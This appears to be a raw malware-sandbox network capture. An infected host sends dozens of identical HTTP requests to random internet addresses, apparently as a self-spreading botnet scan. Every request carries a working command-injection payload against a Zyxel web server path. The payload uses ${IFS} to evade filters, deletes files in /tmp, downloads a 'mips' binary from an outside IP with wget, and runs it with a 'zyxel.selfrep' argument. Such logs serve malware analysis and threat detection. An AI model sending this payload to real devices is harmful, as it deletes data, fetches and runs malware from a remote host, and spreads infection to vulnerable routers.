                        Mar 12, 2024 08:50:41.231946945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3314192.168.2.1460260169.204.0.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231967926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3315192.168.2.1435448184.121.173.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.231997013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3316192.168.2.143648638.140.13.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232049942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3317192.168.2.143504043.22.177.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232080936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3318192.168.2.145256649.59.166.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232103109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3319192.168.2.144752862.45.246.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232139111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3320192.168.2.144312452.49.51.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232177019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3321192.168.2.1444938154.74.42.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232229948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3322192.168.2.1435786103.200.18.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.232259989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3323192.168.2.1442030181.246.171.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235169888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3324192.168.2.1451676183.225.175.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235203981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3325192.168.2.145057264.147.159.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235217094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3326192.168.2.144593497.12.31.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235255957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3327192.168.2.1447370154.243.215.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235305071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3328192.168.2.145789686.9.173.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235338926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3329192.168.2.1449338135.109.151.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235346079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3330192.168.2.143888493.70.32.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235371113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3331192.168.2.1439258195.27.41.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235388041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3332192.168.2.1449922207.196.246.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235409021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3333192.168.2.1460726125.202.196.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235414982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3334192.168.2.1438288123.86.216.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.235450029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3335192.168.2.1435664114.121.142.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231033087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3336192.168.2.1439852209.158.24.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231113911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3337192.168.2.1437128202.103.226.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231143951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3338192.168.2.1455534194.185.104.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231179953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3339192.168.2.1435084104.156.131.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231231928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3340192.168.2.1443532182.187.165.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231292009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3341192.168.2.1451148182.120.212.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231318951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3342192.168.2.1450660104.199.111.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231354952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3343192.168.2.1457876144.34.10.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231419086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3344192.168.2.1443444169.208.12.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231448889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3345192.168.2.1445686170.41.108.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231518984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3346192.168.2.1435162140.114.172.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231548071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3347192.168.2.1459024148.167.29.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231600046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3348192.168.2.1433590211.220.77.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231627941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3349192.168.2.14355624.222.230.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231659889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3350192.168.2.1448314206.193.224.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231699944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3351192.168.2.145178479.47.176.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231744051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3352192.168.2.1458760170.169.147.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231771946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3353192.168.2.1452398116.51.71.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231818914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3354192.168.2.145772889.47.62.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231842995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3355192.168.2.144253883.135.174.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231894970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3356192.168.2.1443378110.151.227.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231915951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3357192.168.2.1438928117.163.135.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.231986046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3358192.168.2.144875879.233.104.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232019901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3359192.168.2.1434170115.132.39.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232119083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3360192.168.2.1458752223.241.21.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232145071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3361192.168.2.144378465.193.41.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232182980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3362192.168.2.1439718123.126.201.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232233047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3363192.168.2.145706264.186.88.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232270956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3364192.168.2.1452548199.167.148.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232295036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3365192.168.2.1435314119.219.83.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232336998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3366192.168.2.145334853.62.255.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232388973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3367192.168.2.145543277.180.162.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232408047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3368192.168.2.144600888.17.202.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232443094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3369192.168.2.1459250166.20.236.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232491016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3370192.168.2.1453178177.184.184.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232518911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3371192.168.2.145644499.244.159.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232549906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3372192.168.2.1457228199.84.119.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232592106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3373192.168.2.1452150191.130.138.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232614040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3374192.168.2.143472469.181.13.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232650042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3375192.168.2.1445068105.85.120.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232675076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3376192.168.2.1439846184.114.238.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232719898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3377192.168.2.1441834188.93.62.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232765913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3378192.168.2.145789251.242.97.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232799053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3379192.168.2.145951440.76.177.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232831955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3380192.168.2.144752447.111.26.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232870102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3381192.168.2.1450186109.48.172.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232887983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3382192.168.2.1439486199.189.46.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232938051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
